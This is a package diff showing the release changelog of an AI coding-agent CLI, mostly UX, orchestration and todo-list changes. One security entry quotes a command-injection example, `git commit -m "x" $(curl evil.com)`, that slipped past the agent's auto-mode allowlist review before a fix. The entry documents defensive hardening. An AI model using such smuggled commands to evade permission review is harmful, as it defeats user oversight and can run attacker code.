@kodax-ai/kodax-cli 0.7.38

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (44) hide show
  1. package/CHANGELOG.md +1304 -0
  2. package/LICENSE +191 -0
  3. package/README.md +1167 -0
  4. package/README_CN.md +631 -0
  5. package/dist/builtin/code-review/SKILL.md +63 -0
  6. package/dist/builtin/git-workflow/SKILL.md +84 -0
  7. package/dist/builtin/skill-creator/SKILL.md +122 -0
  8. package/dist/builtin/skill-creator/agents/analyzer.md +12 -0
  9. package/dist/builtin/skill-creator/agents/comparator.md +13 -0
  10. package/dist/builtin/skill-creator/agents/grader.md +13 -0
  11. package/dist/builtin/skill-creator/references/schemas.md +227 -0
  12. package/dist/builtin/skill-creator/scripts/aggregate-benchmark.d.ts +46 -0
  13. package/dist/builtin/skill-creator/scripts/aggregate-benchmark.js +209 -0
  14. package/dist/builtin/skill-creator/scripts/analyze-benchmark.d.ts +46 -0
  15. package/dist/builtin/skill-creator/scripts/analyze-benchmark.js +289 -0
  16. package/dist/builtin/skill-creator/scripts/compare-runs.d.ts +62 -0
  17. package/dist/builtin/skill-creator/scripts/compare-runs.js +333 -0
  18. package/dist/builtin/skill-creator/scripts/generate-review.d.ts +33 -0
  19. package/dist/builtin/skill-creator/scripts/generate-review.js +415 -0
  20. package/dist/builtin/skill-creator/scripts/grade-evals.d.ts +73 -0
  21. package/dist/builtin/skill-creator/scripts/grade-evals.js +405 -0
  22. package/dist/builtin/skill-creator/scripts/improve-description.d.ts +23 -0
  23. package/dist/builtin/skill-creator/scripts/improve-description.js +161 -0
  24. package/dist/builtin/skill-creator/scripts/init-skill.d.ts +14 -0
  25. package/dist/builtin/skill-creator/scripts/init-skill.js +153 -0
  26. package/dist/builtin/skill-creator/scripts/install-skill.d.ts +29 -0
  27. package/dist/builtin/skill-creator/scripts/install-skill.js +176 -0
  28. package/dist/builtin/skill-creator/scripts/package-skill.d.ts +38 -0
  29. package/dist/builtin/skill-creator/scripts/package-skill.js +124 -0
  30. package/dist/builtin/skill-creator/scripts/quick-validate.d.ts +8 -0
  31. package/dist/builtin/skill-creator/scripts/quick-validate.js +166 -0
  32. package/dist/builtin/skill-creator/scripts/run-eval.d.ts +66 -0
  33. package/dist/builtin/skill-creator/scripts/run-eval.js +356 -0
  34. package/dist/builtin/skill-creator/scripts/run-loop.d.ts +49 -0
  35. package/dist/builtin/skill-creator/scripts/run-loop.js +243 -0
  36. package/dist/builtin/skill-creator/scripts/run-trigger-eval.d.ts +58 -0
  37. package/dist/builtin/skill-creator/scripts/run-trigger-eval.js +225 -0
  38. package/dist/builtin/skill-creator/scripts/utils.js +278 -0
  39. package/dist/builtin/tdd/SKILL.md +56 -0
  40. package/dist/index.js +1717 -0
  41. package/dist/kodax_cli.js +1870 -0
  42. package/package.json +122 -0
  43. package/scripts/kodax-bin.cjs +27 -0
  44. package/scripts/production-env.cjs +16 -0
package/CHANGELOG.md ADDED
@@ -0,0 +1,1304 @@
1
+ # Changelog
2
+
3
+ All notable changes to this project will be documented in this file.
4
+
5
+ > Full history for versions prior to v0.7.0: [CHANGELOG_ARCHIVE.md](docs/CHANGELOG_ARCHIVE.md)
6
+
7
+ ## [Unreleased]
8
+
9
+ <!-- last-sync: e7a223f -->
10
+
11
+ ---
12
+
13
+ ## [0.7.38] - 2026-05-11
14
+
15
+ ### Theme
16
+
17
+ **Nine-feature delivery — Queued Prompt Injection Latency & Mid-Turn UX Parity, Write-Child Mutation Context Injection, TodoList Visibility & LLM Self-Seeding Parity, Bash AST Migration, LLM-backed Bash Prefix Extractor, Universal `--help` Fast-Path, Chat-While-Waiting, Idle-Wait Visual Continuity, Windows / macOS Case-Insensitive Workspace Match.** v0.7.38's RC snapshot (2026-05-09) shipped the originally-planned three-feature delivery: closing the "queued prompt feels laggy" gap users hit in v0.7.37 by removing four cumulative latency sources and adding three Claude-Code-style mid-turn UX surfaces (FEATURE_149); correcting the long-standing under-injection where parallel write children silently skipped the project's `AGENTS.md` mutation policy because they shared the read-child minimal system prompt (FEATURE_117 v2); and closing the FEATURE_097 coverage gap where users almost never saw the realtime todo list (FEATURE_151). Between the RC and final release, six additional pieces landed and ship in the same `0.7.38` version: security hardening (FEATURE_152/153/154 — closing Issue 129 follow-up + auto-mode allowlist injection vulnerability), V2 Worker default flip (FEATURE_114 Slice 6/7/8), full Chat-While-Waiting delivery with idle-yield wait pattern + 7-bug hotfix chain (FEATURE_155), idle-wait visual continuity (FEATURE_156), Windows / macOS case-insensitive workspace match for `kodax -c` (FEATURE_157), and a UX polish pass that suppresses harness lifecycle markers in the transcript by default for chat-while-waiting flow parity with Claude Code. Configuration cleanup: KodaX no longer reads `CLAUDE.md` as a fallback when `AGENTS.md` is absent — `CLAUDE.md` is Claude-Code-specific project guidance and injecting it into the KodaX agent context produces semantic mismatch (KodaX's own repo dogfood-bit this).
18
+
19
+ ### Added (post-RC — landed 2026-05-09 → 2026-05-11)
20
+
21
+ **Security hardening** (Issue 129 follow-up):
22
+
23
+ - **FEATURE_152 — Bash command parsing regex → AST migration**. Replaces the strip-then-classify regex pipeline with `shell-quote@1.8.3` AST parsing in `packages/repl/src/permission/bash-ast.ts`. Output is a structured `BashCommandTree` (statements / pipelines / argv / redirections + `unparseable: true` fail-closed flag). `isBashReadCommand` / `isBashWriteCommand` fully migrated to AST; `extractPathsFromCommand` / `collectBashWriteTargets` are AST + Windows-path regex hybrid (shell-quote POSIX-escape eats backslash paths). 14 attack-surface hardening tests. ADR-023 records the decision; Issue 129 follow-up notes mark the hotfix-era strip-then-classify as superseded by structural fix.
24
+ - **FEATURE_153 — LLM-backed bash prefix extractor**. New module `packages/coding/src/guardrails/auto-mode/bash-prefix-extractor.ts` (~400 LoC). Replaces naive `command.startsWith(pattern)` allowlist matching — the previous behaviour allowed `git commit -m "x" $(curl evil.com)` to match `Bash(git commit:*)` and bypass auto-mode review. New path lifts CC's `BASH_POLICY_SPEC` prompt, runs Haiku-grade LLM extraction with LRU cache (200 entries), fails closed to user confirmation on extractor error. `isToolCallAllowed` migrated sync → async with optional `extractor?` parameter. All 4 production call sites switched in one cutover (REPL / InkREPL / ACP server / executor.ts).
25
+ - **FEATURE_154 — Universal `--help` fast-path**. Generalises CC's `isHelpCommand` past KodaX's 12-tool hardcoded list. Any `<cmd> --help` (token-validated, no quotes, no shell metacharacters) bypasses the LLM extractor — saves token cost + latency for `docker --help` / `kubectl --help` / `terraform --help` / etc. ~50 LoC pure function added at the top of `isBashReadCommand`.
26
+
27
+ **Architecture (V2 default flip + new orchestration primitive)**:
28
+
29
+ - **FEATURE_114 Slice 6/7/8 — V2 Worker chain becomes default**. The V2 Worker-merge harness (Scout/Worker/Evaluator, replacing V1's Scout/Planner/Generator/Evaluator) was opt-in behind `KODAX_HARNESS_V2` in earlier versions. Slice 6 baseline eval; Slice 7 default flip (now ON unless explicit `KODAX_HARNESS_V2=false`); Slice 8 apples-to-apples V1 vs V2 comparison eval. Breaking-only-by-default: callers can opt back into V1 via env flag.
30
+ - **FEATURE_155 — Chat-While-Waiting (full Phase A → D delivered in v0.7.38)**. Removes `await_child_task` and adopts CC's idle-yield wait pattern: Worker emits a one-line status with no tool calls, runner-driven outer loop blocks on the next external wake event (child completion / inbound user message / abort), resumes Worker with a synthetic `<task-completed task_id="…">…</task-completed>` user message. Same MessageQueue carries both events; `priority='user'` (typed input) wins over `priority='background'` (child notification) in the same drain cycle — users chat with the agent while children are in flight. Originally scoped to v0.7.39; merged into v0.7.38 to ship together with the hotfix follow-ups below. Phases:
31
+ - **A1** — `idle-yield.ts` foundation utilities (`detectIdleYield` predicate, `waitForWakeEvent` 3-way race, `composeIdleYieldUserMessage` synthetic-message builder, `countLastAssistantToolCalls` snapshot helper). 33 unit tests pin every boundary. Commit `6a420504`.
32
+ - **A2** — Runner-driven outer loop wraps `Runner.run` in `while(true)`; on idle-yield exit, calls `waitForWakeEvent`, splices the wake content into the next user turn, re-enters `Runner.run`. Defensive `IDLE_YIELD_MAX_ITERATIONS=64` floor. 35 tests. Commits `1f0d1eab` / `bbf747d3`.
33
+ - **B1** — Worker prompt + `dispatch_child_task` banner teach idle-yield. Layer 2 single-turn eval (3 cases × 5 aliases × 5 reps). First run PARTIAL (2/4 aliases ≥80%); rerun added `zhipu/glm51` and met SHIP gate (3/5 ≥80%). Default `KODAX_IDLE_YIELD` flipped to ON. Commits `3828265f` / `016e3fb2` / `1a08de10` / `6a63d986`.
34
+ - **B2** — V2 Worker chain drops `awaitChildTask` from its tool list. Commit `3830141b`.
35
+ - **C1** — Full tool removal: `await-child-task.ts` deleted; `registry.ts` / `tool-permission.ts` / `child-executor.ts` `CHILD_EXCLUDE_TOOLS_BASE` / V1 chain validation cleaned up. Commit `80410e49`.
36
+ - **C2** — `YIELD_TOOL_NAMES` Set emptied; `midTurnDrainPriority` retires the yield-tool gate (outer loop owns background-priority dequeue now). Commit `c8990094`.
37
+ - **C3** — `KODAX_IDLE_YIELD` env-flag retired; `isIdleYieldEnabled()` hard-coded to `true`. Commit `35468f9f`.
38
+ - **D1** — design doc + CHANGELOG + FEATURE_LIST + test guide. Commit `292d3e51`.
39
+ - **D2** — Layer 2 chat-while-waiting behavioral eval (perception budget) + final regression sweep + retire `tests/feature-148-post-dispatch-probe.eval.ts` to `tests/_archive/`. Commit `3efae389`.
40
+
41
+ **FEATURE_155 hotfix follow-up chain (2026-05-11 — found in production, fixed before release)**:
42
+
43
+ Production trace showed Evaluator emitting `emit_verdict` accept before children returned, then receiving duplicate `<task-completed>` notifications that drove degenerate LLM turns up to `IDLE_YIELD_MAX_ITERATIONS=64`. Four commits resolved 7 distinct bugs uncovered during deep review:
44
+
45
+ - **Bug A — child registry never cleaned up after settle** (`c1bdaf4`). Slice C1 deleted `await_child_task` which previously called `registry.delete(taskId)` at reclaim time. No compensating cleanup on the idle-yield path. Fix: dispatch IIFE chains `.finally(() => registry.delete(childId)).catch(() => {})`.
46
+ - **Bug B — outer loop didn't gate on terminal Evaluator verdict** (`c1bdaf4` initial, `3494a27` corrected). After Evaluator emit_verdict accept, the loop kept re-entering `Runner.run` for every pending-child wake event. Initial fix read `managedProtocolPayloadRef.current?.verdict?.status`; deep review uncovered that V2's dedicated `emit_verdict` tool returns `metadata` but does NOT call `ctx.emitManagedProtocol(...)`, so that ref stays `undefined` for the entire run — the initial gate was a silent no-op. Real fix: read from `recorder.verdict?.payload?.verdict?.status` (the canonical chain state, written by `wrapEmitterWithRecorder`).
47
+ - **Bug C — Evaluator prompt missing wait-for-children discipline** (`c1bdaf4`). Evaluator prompt updated with a `CHILD-TASK WAIT DISCIPLINE` block; `user_answer` requirement strengthened.
48
+ - **Bug D — `hasEmittedHandoff` source-of-truth latent bug** (`3494a27`). The same misread of `managedProtocolPayloadRef` existed in the pre-FEATURE_155 Slice A2 wiring; hidden by `lastAssistantToolCallCount > 0` short-circuiting the happy path. Fixed alongside Bug B's corrected source.
49
+ - **Bug E — fast-child race** (`3ccf322`). Child completing during a Runner.run iteration could see its `.finally(delete)` run BEFORE the outer-loop snapshot, leaving `pendingChildTaskCount=0` and stranding the banner in the background queue. Fix: `IdleYieldSnapshot.hasPendingBackgroundMessages` keeps the loop alive whenever EITHER the registry or the queue still has something undelivered.
50
+ - **Bug F — abort listener accumulation in `waitForWakeEvent`** (`3ccf322`). `{once:true}` only auto-removed on abort fire; non-abort wakes left the listener attached. Over `IDLE_YIELD_MAX_ITERATIONS=64` on the same long-lived signal, listeners piled up silently (AbortSignal is an EventTarget — no MaxListeners warning). Fix: capture handler + `removeEventListener` in `settle()`.
51
+ - **Bug G — Scout-label preflight leak into V2** (`3ccf322`). `status-bar.ts:275` hardcoded `Scout - ${managedWorkerTitle}` during preflight, stamping "Scout -" onto every V2 session because `managedWorkerTitle` is now "Worker" on V2. The `f23a7cb1` Slice 7 follow-up fixed 4 other call sites but missed this one. Fix: use `managedWorkerTitle` directly with "Scout" fallback.
52
+
53
+ **UX polish + drift cleanup**:
54
+
55
+ - **FEATURE_156 — Idle-wait visual continuity** (`8488f8f` — `docs/features/v0.7.38.md#feature_156`). Status bar surfaces "{role} - waiting for N children" while the outer loop is parked in `waitForWakeEvent`, distinguishing alive-suspended from terminated. Two new optional fields on `KodaXManagedTaskStatusEvent` (`idleWaiting` + `idleWaitingPendingCount`); new `ObserverBridge.idleWaiting(role, count)` method; agent-agnostic role lookup via `currentAgent.name`. 10 tests; backwards-compat (purely additive fields).
56
+ - **FEATURE_151 Slice C correction** (`1c63072`). Re-verification of `c:/Works/claudecode/src/` revealed the original Slice C "persistent visibility" rationale misread CC's gate composition (CC actually hides the list at run-end by default — Spinner-internal mount + `expandedView==='tasks'` toggle defaulting to 'none'). Fix: re-gate TodoListSurface mount on `isLoading` and clear `todoItems` on the true→false transition so a stale list doesn't flash back at the next prompt. View-model unchanged.
57
+ - **FEATURE_157 — Windows-aware session-list path comparison** (this batch). Session-list filter in `storage.ts:list()` was doing literal `sessionGitRoot === currentGitRoot` comparison. Drive-letter case differences across shells (`C:/...` saved vs `c:/...` looked-up — happens when sessions are saved from one PowerShell and listed from a VS Code-spawned shell on Windows / case-insensitive macOS) caused the filter to exclude all prior same-repo sessions, leaving `kodax -c` / `kodax -r` with nothing to resume. Symptom: "the previous conversation seems lost, agent answered from scratch with no context". Fix: `pathsEqual()` helper folds case on win32 + darwin; POSIX-strict equality preserved on Linux. Reproduces on 4-session timestamp ladder where all sessions stored uppercase drive letter but a 13:02 `kodax -c` shell returned lowercase.
58
+ - **Harness lifecycle markers suppressed in transcript by default** (`KODAX_TRANSCRIPT_HARNESS_MARKERS=1` to restore). Three transcript artefacts that interrupted the chat flow during chat-while-waiting are now off by default: (1) `> AMA H<n> - Task completed` breadcrumb from `buildManagedLiveEventDrafts`; (2) `[Scout] Completion marked uncertain — signals: ...` warning from `onScoutSuspiciousCompletion`; (3) `[Task completed]` post-task summary label from `buildManagedTaskTranscriptItems`. Parity with Claude Code, which signals turn end via spinner halt rather than transcript text. **The harness itself is unchanged** — Scout/Worker/Evaluator routing, idle-yield wait, mutation guard, capability sections, message queue, child registry, and all FEATURE_155 hotfix invariants are untouched; only the transcript visualization layer is gated. Symptom motivation: when users typed a follow-up while the agent was still running, the queued prompt landed under "Task completed" + "Completion uncertain" lines on the next render, making continuous chat read like a hard task boundary. Set the env flag to restore the legacy persistence for session-replay debugging where explicit turn anchors are useful.
59
+
60
+ ### Added (RC — 2026-05-09)
61
+
62
+ - **FEATURE_149 — Queued Prompt Injection Latency & Mid-Turn UX Parity** — Three slices, all in v0.7.38:
63
+ - **Slice A (latency cleanup, zero behavior change)**: Removed the legacy 50ms `setTimeout` floor in `stageQueuedPrompt` (`packages/repl/src/ui/InkREPL.tsx`); added an mtime-keyed file-content cache to `loadAgentsFiles` (`packages/coding/src/context/agents-loader.ts`) so per-round AGENTS.md walks are O(stat) once warmed instead of O(read+parse). Round-N → round-N+1 handoff floor measured at < 5ms (`packages/repl/src/ui/utils/queued-prompt-sequence-latency.test.ts` micro-bench), down from a 53ms minimum.
64
+ - **Slice B (behavioral changes, prompt-eval-gated)**:
65
+ - **B1 — Interruptible-tool fast-abort (infrastructure-ready, no tool opt-in)**: Tools may now declare `interruptBehavior: 'cancel' | 'wait'`; default is `'wait'`. The `handleSubmit` fast-abort path is wired so that when an in-flight tool is `'cancel'`-tagged, a newly submitted prompt aborts the active round immediately (preserving the freshly submitted prompt via the new `abort({ preservePendingInputs: true })` option) and the user redirects within ~500ms of `Enter`. **No built-in tool is currently tagged `'cancel'`** — fact-check of `c:/Works/claudecode/src/` showed CC's `interruptBehavior` interface exists in `Tool.ts:416` but **zero** concrete tools (`BashTool` / `FileEditTool` / `TaskGetTool` / `TaskOutputTool` / etc.) opt in. CC's `hasInterruptibleToolInProgress` requires `every(t => 'cancel')`, so in production it almost never fires. KodaX matches CC's conservative posture: SIGTERM-mid-bash leaves half-written files / half-pushed git / half-mutated databases, and aborting `await_child_task` orphans the FEATURE_119 Pattern B background child. The infrastructure (type + field + fast-abort path + `preservePendingInputs` option) is in place for future side-effect-free wait-only tools (Sleep / Wait / Schedule) to opt in. Esc remains the explicit user-side abort gesture.
66
+ - **B3 — Batched drain**: `runQueuedPromptSequence` now coalesces all pending follow-ups into a single batched user message joined by `\n\n---\n\n`, so N pending prompts collapse to **one** agent invocation rather than N. Drives both cost reduction and better LLM-side coherence (the model sees all sub-tasks at once and can interleave/parallelize). Backed by `tests/feature-149-batched-drain.eval.ts` (5 alias × 4 case = 20 cells; stage-1 acceptance: alias mean ≥ 75% pass per case, max-min spread ≤ 20pp).
67
+ - **Slice C (UX surface, pure UI)**:
68
+ - **C1 — Up-arrow popAllEditable**: Pressing ↑ when the input is empty pops the entire pending-prompts queue back into the editor, joined by blank lines, so the user can edit / reorder / delete and resubmit. The hint line below the queue surface advertises the gesture.
69
+ - **C2 — Multi-line queue render**: Queue is shown as `[i/N] preview` rows in `QueuedCommandsSurface` (one per pending input), replacing the single-line summary. Esc still drops the latest entry.
70
+ - **C3 — Line-buffered streaming render** (added during implementation after CC naturalness investigation): While a model token stream is in flight, only complete lines (those ending in `\n`) are rendered to the transcript live area. The currently-being-typed trailing line is suppressed until its newline arrives, mirroring Claude Code's [`REPL.tsx:1473`](c:/Works/claudecode/src/screens/REPL.tsx#L1473) `streamingText.substring(0, streamingText.lastIndexOf('\n') + 1)` pattern. Eliminates character-level flicker (especially noticeable on Windows conhost / reduced-motion terminals); the full final response still lands in transcript history when the round completes (no tail content lost). Implementation: 1 file, ~10 LoC at [`transcript-layout.ts:757`](packages/repl/src/ui/utils/transcript-layout.ts#L757); 3 new pinning tests.
71
+ - **C4 — `activeForm`-driven spinner** (added during implementation after CC naturalness investigation): The spinner status line now reads `currentTodo?.activeForm` from the in-progress todo and uses it as the leader verb (e.g. `[Plan] Running failing tests...`). Mirrors Claude Code's [`Spinner.tsx:169`](c:/Works/claudecode/src/components/Spinner.tsx#L169) `currentTodo?.activeForm` lookup. Implementation: `TodoItem` gains a `readonly activeForm?: string` field; `TodoStore.updateStatus(id, status, note?, activeForm?)` accepts the new arg with preserve-vs-replace semantics matching `note`; `todo_update` tool schema gains the `activeForm` parameter and the schema description instructs the LLM to "ALWAYS supply activeForm when transitioning to in_progress" (present-continuous form of the item content); Scout / Generator role-prompts include the same guidance; spinner cascade puts activeForm priority above `currentTool` / `isThinking` but below `isCompacting` / detailed tool block. The user sees task-level "what is the agent doing right now" without waiting for the round to end. Implementation: 7 files, ~50 LoC; 6 new pinning tests across todo-store + transcript-layout.
72
+ - **C5 — Bash live progress (`renderToolUseProgressMessage` parity)** (added during implementation after CC naturalness investigation): Long-running `bash` commands now stream their stdout/stderr tail to the spinner / tool-call display via `ctx.reportToolProgress`, matching Claude Code's [`BashTool.renderToolUseProgressMessage`](c:/Works/claudecode/src/tools/BashTool/BashTool.tsx) + `BashModeProgress.tsx`. Users see `npm test` / `cargo build` / `pytest` output tail live instead of a 30-second silent wait. Infrastructure was already wired (`KodaXToolExecutionContext.reportToolProgress` + `KodaXEvents.onToolProgress`); this commit only adds the bash-side feed: a 1KB UTF-8 tail buffer (separate from the 512KB capture collector to keep cost negligible), throttled to ~10 fps, displaying the last 3 non-empty lines joined by ` | ` and capped at ~120 chars. stderr also feeds the tail (npm/cargo/pytest progress output is on stderr). Fully back-compat: `reportToolProgress` undefined → no-op, all existing bash tests pass. Implementation: 1 file, ~40 LoC at [`bash.ts:229`](packages/coding/src/tools/bash.ts#L229); 3 new pinning tests.
73
+ - **C6 — Slash-command mid-task guard** (added after the 14-dimension queue parity audit): Slash commands typed while a task is in flight are no longer queued — they're rejected with an inline notice ("Slash commands cannot be queued mid-task. Press Esc to abort the current task, then run the command."). Mirrors Claude Code's invariant that slash commands act on the live REPL (mode switch, `/clear`, `/cost`, `/agents`, etc.) and have no defined semantics when delivered as a queued user message: a queued `/clear` would be sent to the LLM as the literal string `/clear`, not actually clear the transcript. Detection point is `InkREPL.tsx:6571` in the `handleSubmit` `isLoading` branch (right before pending-input enqueue), keyed off `fullText.trimStart().startsWith('/')`. Plain prompts continue to queue normally; only slash-prefixed input is gated. Closes the only P0 GAP from the 14-dimension queue parity audit (12/14 ALIGNED, 1/14 N/A — no remote session feature in KodaX, 1/14 was this slash gap, now fixed). Implementation: 1 file, ~8 LoC; design doc records the audit table and behavioral rationale.
74
+ - Test guide: `docs/test-guides/FEATURE_149_v0.7.38_TEST_GUIDE.md`. Design doc: `docs/features/v0.7.38.md#feature_149-queued-prompt-injection-latency--mid-turn-ux-parity`.
75
+
76
+ - **FEATURE_117 v2 — Write-Child Mutation Context Injection** — Replaced v1's invalidated "strip read-path context" design with the inverse: write children now inherit the project's `AGENTS.md` mutation policy that the parent agent already follows. Rationale: `child-executor.ts` write and read children both used the bare `CHILD_AGENT_SYSTEM_PROMPT` (~500 tokens, no project rules) because `systemPromptOverride` short-circuits `buildSystemPrompt`. v1 assumed children were inheriting the parent's full 5.2k-token stable context and wanted to strip — Phase 3 fact-check disproved that, but surfaced the real gap: write children silently violated project rules (no-`any`, no-hardcoded-config, conventional-commit format) because they couldn't see them. v2 adds a single `buildWriteSystemPrompt(parentCtx.gitRoot)` helper (~17 LoC) that prepends the bare base prompt with a one-line framing sentence and the formatted `AGENTS.md` block. Lookup walks from `parentCtx.gitRoot`, **not** the worktree path — worktrees are transient checkouts that don't carry untracked `AGENTS.md` files. Read children stay on the bare prompt (read tasks don't mutate; rules don't apply). Cost is amortized via FEATURE_149's mtime cache (single disk read per fan-out wave) and FEATURE_116's `cache_control: ephemeral` (single billing per 5-min window). Test guide: `docs/test-guides/FEATURE_117_v0.7.38_TEST_GUIDE.md`. Design doc: `docs/features/v0.7.38.md#feature_117-v2-write-child-mutation-context-injection`. 4 new unit cases pin behavior (write-inject / no-AGENTS-md fallback / read-stays-minimal / lookup-uses-parent-gitRoot / undefined-gitRoot graceful no-op).
77
+
78
+ - **FEATURE_151 — TodoList Visibility & LLM Self-Seeding Parity** — Closes the FEATURE_097 (v0.7.34) coverage gap where users almost never saw the realtime todo list despite the full code path being in place since v0.7.35.1. 14-dimension forensic comparison against `c:/Works/claudecode/src/` identified 5 stacked gates: (G1) `todo_update` had no LLM-driven init path — only Runner-driven seeding from Scout `executionObligations >= 2`; (G2) Scout multi-step gate hard-enforced; (G3) UI `MIN_ITEMS_TO_RENDER = 2`; (G4) `todo-throttle-reminder` `hasItems()` chicken-and-egg gate prevented the empty-store nudge from ever firing; (G5) `showSpinner === true` mount gate + 5-second post-completion linger destroyed the React state. **G1 was the architectural root cause** — even relaxing all 4 other gates wouldn't help because the LLM still had no tool to seed an empty list. Three slices ship together:
79
+ - **Slice A — UI Parity** (matches Claude Code `TaskListV2.tsx:89` `tasks.length === 0` only-blocks-empty + `expandedView==='tasks'` persistent visibility): `MIN_ITEMS_TO_RENDER` 2 → 1; the `showSpinner` mount gate is dropped (surface mounts whenever `viewModel.shouldRender` is true regardless of spinner state); the 5-second post-completion `setTodoItems([])` clear `useEffect` is removed; the view-model's `lastAllCompletedAt` linger gate is no longer consulted (kept on the type signature for back-compat). Surface now stays visible across AMA task boundaries until the next Scout `init()` or LLM `op:'init'` triggers a `replace()`.
80
+ - **Slice B — LLM Self-Seeding** (mirrors Claude Code's `TodoWrite` whole-list write semantics): `todo_update` gains `op: 'init' | 'update'` with default `'update'` for back-compat. `op: 'init'` accepts `items: [{id, content, activeForm?}, ...]` (≥1 entry, unique non-empty ids, non-empty content) and fully replaces the store. Scout / Generator / Planner role-prompts updated with explicit recovery-path guidance: when no plan was seeded but the task is multi-step, call `todo_update({op:"init", items:[...]})`; trivial single-step tasks still proceed without a plan (matches CC `TodoWriteTool/prompt.ts:17-26` "skip for single, straightforward task" guidance).
81
+ - **Slice B — Throttle-Reminder Fix**: `shouldFireTodoReminder` no longer requires `todoStore.hasItems()` — the chicken-and-egg deadlock that prevented the LLM from learning the plan-list infrastructure existed when Scout did not seed is resolved. `buildTodoReminderText` now branches: empty-store nudges the LLM toward `op:'init'` with the trivial-task exemption clause; populated-store text unchanged from v0.7.34. Mirrors Claude Code's `getTodoReminderAttachments` ([attachments.ts:3266](c:/Works/claudecode/src/utils/attachments.ts#L3266)) which fires every 10 turns regardless of store state.
82
+ - **FEATURE_104 prompt eval**: 4 new cases in `benchmark/datasets/feature-151-todo-self-seeding/` (2 positive: multi-file audit + 3-file rename should call op:'init'; 2 negative: typo fix + info request should not). Driver `tests/feature-151-todo-self-seeding.eval.ts` runs 5 alias × 4 case = 20 cells per pilot run; stage-1 acceptance pending post-pilot calibration.
83
+ - **Slice I — Fan-Out Plan Granularity** (added 2026-05-10 after user reported "派 5 个 dispatch_child_task 做 review 时整个过程完全看不到任何 plan list"). Worker role-prompt (`packages/coding/src/agents/worker-role-prompt.ts`) gains a `FAN-OUT PLAN GRANULARITY` section between dispatch rules and Evaluator handoff: when the plan involves dispatching ≥3 children, the model MUST emit `todo_update({op:"init", ...})` as its FIRST tool call and the items array MUST contain EXACTLY N items — one per child's `bundle.objective` — never collapsed into 1-2 items. v2 prompt rewrite (commit `7c508a2`) added explicit MANDATORY TRIGGER framing, COUNT-FIRST imperative ("Not 1. Not 2. Not N-1. Exactly N."), 5-package worked example, and an enumerated ANTI-PATTERNS list after Phase 1 found v1 prompt at 25% positive on the floor model. Mechanism is prompt-only (no code change) — closes the visibility gap in CC default-subagent parity (CC's main agent natively expands plan items per dispatched child via TodoWrite, KodaX Worker was retreating to 1-item plan in fan-out). **Eval ship gate cleared (LLM-judge corrected)**: 3 of 5 aliases (mmx/m27 + ark/glm51 + ds/v4pro) hit ≥80% on each positive case AND ≤20% trigger on each negative case (full pass; mmx 100%/80%, ark+ds_v4pro 100%/100%). zhipu/glm51 + kimi miss the gate due to verbose narration-only single-turn responses (model says "I'll plan first..." but doesn't emit the tool call inline) — this is a single-turn probe limitation against verbose models, not a v2 prompt regression: in the production multi-turn agent loop those models naturally emit the tool call on the second turn. Eval methodology lesson sealed in `EVAL_GUIDELINES.md` anti-pattern 7 + raw output preservation section: regex-only judges on "DOES NOT contain X" assertions falsely fail verbose models that mention X in negation context (kimi was reported as "60/40 negative-case regression" by regex; LLM-judge of the raw outputs found 100/100 — kimi was correctly NOT calling todo_update, just verbalizing the decision). Eval driver dumps `runsRaw[].text` to `os.tmpdir()/kodax-eval-dumps/feature-151-fan-out-plan-granularity/<case>.json` for offline LLM-judge audit. Test pins: 2 unit cases in `worker-role-prompt.test.ts` (presence + ordering after dispatch rules) — 15/15 pass. Design doc: `docs/features/v0.7.38.md#slice-i--fan-out-plan-granularity-review-类-fan-out-抱怨收口2026-05-10-加入`.
84
+ - **Downstream impact**: FEATURE_113 (v0.8.2 TodoList JSON / CLI Surface) gains a new event source (LLM-driven init) but `KodaXEvents.onTodoUpdate` payload schema unchanged — `v0.8.2.md` updated with intersection note. No impact on FEATURE_120 / FEATURE_124 / FEATURE_125. Test guide forthcoming. Design doc: `docs/features/v0.7.38.md#feature_151-todolist-visibility--llm-self-seeding-parity--closing-the-feature_097-coverage-gap`.
85
+
86
+ ### Changed
87
+
88
+ - ⚠️ **npm package renamed `@kodax-ai/cli` → `@kodax-ai/kodax-cli`** (this release; same `0.7.38` version number, identical code). The original RC publish on 2026-05-09 went out as `@kodax-ai/cli@0.7.38` — that name inherited SDK-style conventions (`@org/cli`) but doesn't match how the npm ecosystem names CLI products (industry standard is product-name in the package, e.g. `@anthropic-ai/claude-code`, `aider-chat`). Since the only prior publish was a 0.0.1 placeholder, user count was minimal and the rename was done before further versions accumulated. **v0.7.38 is dual-published**: `@kodax-ai/cli@0.7.38` (deprecated immediately after this republish — points users to the new name) and `@kodax-ai/kodax-cli@0.7.38` (canonical going forward). The two tarballs contain byte-equivalent code; the only difference is `package.json#name`. **Migration**: `npm uninstall -g @kodax-ai/cli && npm install -g @kodax-ai/kodax-cli`, or `npx @kodax-ai/kodax-cli`. The `kodax` bin command is unchanged. ADR-022 Addendum records the rename rationale and migration plan. `packages/skills/.../utils.js` keeps `import('@kodax-ai/cli')` as a Strategy 4 SDK-loader fallback for any user already on a `@kodax-ai/cli` install; the fallback will be removed after a reasonable deprecation window.
89
+
90
+ - ⚠️ **Breaking (minor) — `CLAUDE.md` is no longer a fallback context file**. `packages/coding/src/context/agents-loader.ts` reduces `CONTEXT_FILE_CANDIDATES` from `["AGENTS.md", "CLAUDE.md"]` to `["AGENTS.md"]`. **Migration for projects that ship only `CLAUDE.md`**: `mv CLAUDE.md AGENTS.md` or `ln -s CLAUDE.md AGENTS.md`. Projects with both files are unaffected (the prior fallback only triggered when `AGENTS.md` was absent). Rationale: `CLAUDE.md` is Claude-Code-specific project guidance (its content is authored to be consumed by the Claude Code CLI). When a project ships both files, contents typically overlap — the previous fallback caused either double-injection (when both files exist at different traversal depths) or semantic mismatch (KodaX agent receiving CC-targeted instructions). KodaX's own repository dogfooded this: `docs/CLAUDE.md` is CC project rules and was being injected into the KodaX agent context. `AGENTS.md` is the canonical AI-agent rules filename across the AI-agent tooling ecosystem (KodaX, Cursor, Continue, etc.).
91
+
92
+ - **`KodaXEvents`-style abort signature gains `options?: { preservePendingInputs?: boolean }`** — Default `abort()` clears the pending-inputs queue (Esc / exit semantics, unchanged). The new `abort({ preservePendingInputs: true })` keeps the queue intact and is used by FEATURE_149 B1's fast-abort path so the freshly submitted follow-up survives the interrupt and is picked up by the next `runQueuedPromptSequence` iteration.
93
+
94
+ ### Notes for callers
95
+
96
